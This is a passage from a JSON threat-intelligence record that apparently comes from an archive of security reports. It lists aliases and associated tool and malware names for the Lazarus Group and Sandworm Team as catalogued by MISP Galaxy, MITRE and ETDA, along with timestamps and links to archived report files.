"Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434359, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ab7b1e63fa4e254e947ff147cb5f4c8e312cb28e.pdf", "text": "https://archive.orkl.eu/ab7b1e63fa4e254e947ff147cb5f4c8e312cb28e.txt", "img": "https://archive.orkl.eu/ab7b1e63fa4e254e947ff147cb5f4c8e312cb28e.jpg" } }